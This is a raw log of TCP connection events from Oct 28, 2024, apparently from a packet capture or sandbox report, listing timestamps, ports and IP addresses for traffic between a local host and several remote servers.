                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.596424103 CET4434992613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.670927048 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.670950890 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.677423000 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.677726030 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.934295893 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.934376955 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.007555962 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.013370991 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.042330027 CET4434992213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.043008089 CET49922443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.043030024 CET4434992213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.043744087 CET49922443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.043749094 CET4434992213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.175677061 CET4434992213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.175743103 CET4434992213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.175875902 CET49922443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.183722973 CET49922443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.183742046 CET4434992213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.183770895 CET49922443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.183777094 CET4434992213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.188173056 CET49927443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.188203096 CET4434992713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.192296982 CET49927443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.192406893 CET49927443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.192420006 CET4434992713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.251456022 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.251473904 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.251488924 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.251569986 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.251569986 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.256167889 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.261579037 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.294199944 CET4434992413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.294714928 CET49924443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.294739962 CET4434992413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.296169043 CET49924443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.296174049 CET4434992413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.298933983 CET4434992513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.299372911 CET49925443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.299390078 CET4434992513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.299778938 CET49925443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.299783945 CET4434992513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.338640928 CET4434992613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.339683056 CET49926443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.339683056 CET49926443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.339710951 CET4434992613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.339720011 CET4434992613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.423787117 CET4434992413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.423932076 CET4434992413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.424110889 CET49924443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.424110889 CET49924443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.424138069 CET49924443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.424149990 CET4434992413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.427056074 CET49928443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.427125931 CET4434992813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.427376032 CET49928443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.427376986 CET49928443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.427484035 CET4434992813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.433876038 CET4434992513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.433952093 CET4434992513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.434145927 CET49925443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.434178114 CET49925443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.434178114 CET49925443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.434185982 CET4434992513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.434195042 CET4434992513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.436870098 CET49929443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.436964035 CET4434992913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.437125921 CET49929443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.437203884 CET49929443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.437231064 CET4434992913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.469270945 CET4434992613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.469346046 CET4434992613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.469436884 CET49926443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.469453096 CET4434992613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.469527006 CET49926443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.469589949 CET49926443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.469589949 CET49926443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.469604015 CET4434992613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.469610929 CET4434992613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.472369909 CET49930443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.472415924 CET4434993013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.472753048 CET49930443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.472754002 CET49930443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.472796917 CET4434993013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.482914925 CET4434992320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.483900070 CET49923443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.483921051 CET4434992320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.484877110 CET49923443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.484884977 CET4434992320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.484927893 CET49923443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.484940052 CET4434992320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.499259949 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.500170946 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.525288105 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.530885935 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.771027088 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.771485090 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.902888060 CET4434992320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.902950048 CET4434992320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.903003931 CET4434992320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.903026104 CET49923443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.903042078 CET4434992320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.903117895 CET49923443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.903768063 CET49923443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.903776884 CET4434992320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.903830051 CET49923443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.904107094 CET4434992320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.904191017 CET4434992320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.905371904 CET49923443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.939062119 CET4434992713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.941814899 CET49927443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.941832066 CET4434992713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.942455053 CET49927443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.942460060 CET4434992713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.983941078 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.984044075 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.990305901 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.990322113 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.990334034 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.990346909 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.990359068 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.990370989 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.990395069 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.990484953 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.990492105 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.990504980 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.990515947 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.990536928 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.990549088 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.990561008 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.990571976 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.990572929 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.990598917 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.990823030 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.995783091 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.995877028 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.995889902 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.995899916 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.995975971 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.996047020 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.996105909 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.996117115 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.996196985 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.996220112 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.996241093 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.996257067 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.996269941 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.996285915 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.996310949 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.996412039 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.002360106 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.002607107 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.002804041 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.003129005 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.071063042 CET4434992713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.071168900 CET4434992713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.071795940 CET49927443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.071816921 CET49927443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.071816921 CET49927443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.071827888 CET4434992713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.071835995 CET4434992713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.075282097 CET49931443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.075376034 CET4434993113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.075479031 CET49931443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.075849056 CET49931443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.075882912 CET4434993113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.181951046 CET4434992813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.198623896 CET49928443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.198649883 CET4434992813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.199373007 CET49928443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.199381113 CET4434992813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.252680063 CET4434992913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.260059118 CET49929443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.260080099 CET4434992913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.260790110 CET49929443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.260803938 CET4434992913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.330488920 CET4434992813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.330625057 CET4434992813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.330718994 CET49928443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.331715107 CET49928443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.331756115 CET4434992813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.331784964 CET49928443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.331799984 CET4434992813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.343554020 CET49932443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.343589067 CET4434993213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.343664885 CET49932443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.343902111 CET49932443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.343915939 CET4434993213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.397933006 CET4434992913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.398005009 CET4434992913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.398071051 CET49929443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.398510933 CET49929443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.398535967 CET4434992913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.401572943 CET49933443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.401598930 CET4434993313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.401663065 CET49933443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.402028084 CET49933443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.402040005 CET4434993313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.559789896 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.560210943 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.636023045 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.642255068 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.810642004 CET49705443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.811875105 CET49705443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.816193104 CET4434970523.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.817013025 CET49817443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.817059040 CET44349817162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.817068100 CET49818443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.817090034 CET49815443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.817111969 CET44349815162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.817156076 CET44349818162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.817202091 CET49816443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.817218065 CET44349816162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.818145037 CET4434970523.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.821234941 CET49936443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.821268082 CET4434993623.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.821362972 CET49936443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.827820063 CET4434993113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.830171108 CET49931443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.830214024 CET4434993113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.830636978 CET49931443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.830648899 CET4434993113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.831286907 CET49936443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.831305027 CET4434993623.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.906172991 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.908219099 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.963704109 CET4434993113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.963877916 CET4434993113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.963954926 CET49931443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.964261055 CET49931443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.964271069 CET4434993113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.964289904 CET49931443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.964297056 CET4434993113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.966667891 CET49937443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.966721058 CET4434993713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.966815948 CET49937443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.967010021 CET49937443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.967044115 CET4434993713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.973268986 CET49938443192.168.2.587.106.236.48
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.973289967 CET4434993887.106.236.48192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.976222038 CET49938443192.168.2.587.106.236.48
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.991339922 CET49938443192.168.2.587.106.236.48
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.991353035 CET4434993887.106.236.48192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.101346016 CET49939443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.101396084 CET4434993923.221.22.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.101541996 CET49939443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.101769924 CET49940443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.101802111 CET4434994023.221.22.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.101845026 CET49940443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.102416039 CET49941443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.102447033 CET4434994123.221.22.120192.168.2.5
